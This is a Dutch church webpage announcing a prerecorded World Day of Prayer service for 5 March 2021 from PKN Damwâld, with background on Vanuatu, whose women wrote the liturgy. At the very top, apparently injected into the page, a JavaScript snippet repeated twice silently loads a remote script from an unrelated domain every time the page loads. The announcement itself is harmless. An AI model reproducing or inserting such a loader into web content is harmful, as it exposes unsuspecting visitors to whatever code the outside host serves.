;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Wereldgebedsdag - PKN Damwâld
5 maart 2021
19:00 t/m 20:00
Wereldgebedsdag

De Wereldgebedsdag zal dit jaar ook niet op de normale manier plaatsvinden. De dienst zal van tevoren worden opgenomen in de Sint-Benedictuskerk. Dit moet volgens de regels helaas zonder kerkgangers en zang, maar wel zal Jelte Cuperus de dienst begeleiden met orgelspel. Het thema is: ‘Rotsvast’. De uitzending wordt op 5 maart vanaf 19.00 uur uitgezonden via: https://onlinetsjinst.dezwart.frl
De liturgie voor deze avond is opgesteld door vrouwen uit Vanuatu. Vanuatu is een eilandenrijk in de Stille Oceaan (rechts van Australië op de landkaart). Deze eilanden hoorden tot 1980 voor een deel bij Engeland en voor een deel bij Frankrijk. In dit gebied woeden regelmatig orkanen en soms komt daar ook nog een tsunami (enorme vloedgolf) bij. Het is daarom wel te begrijpen waarom het comité van Vanuatu gekozen heeft voor de Bijbeltekst over een stevig fundament voor je huis.
Laat u ook het wereldgebed rond de wereld gaan op deze speciale dag?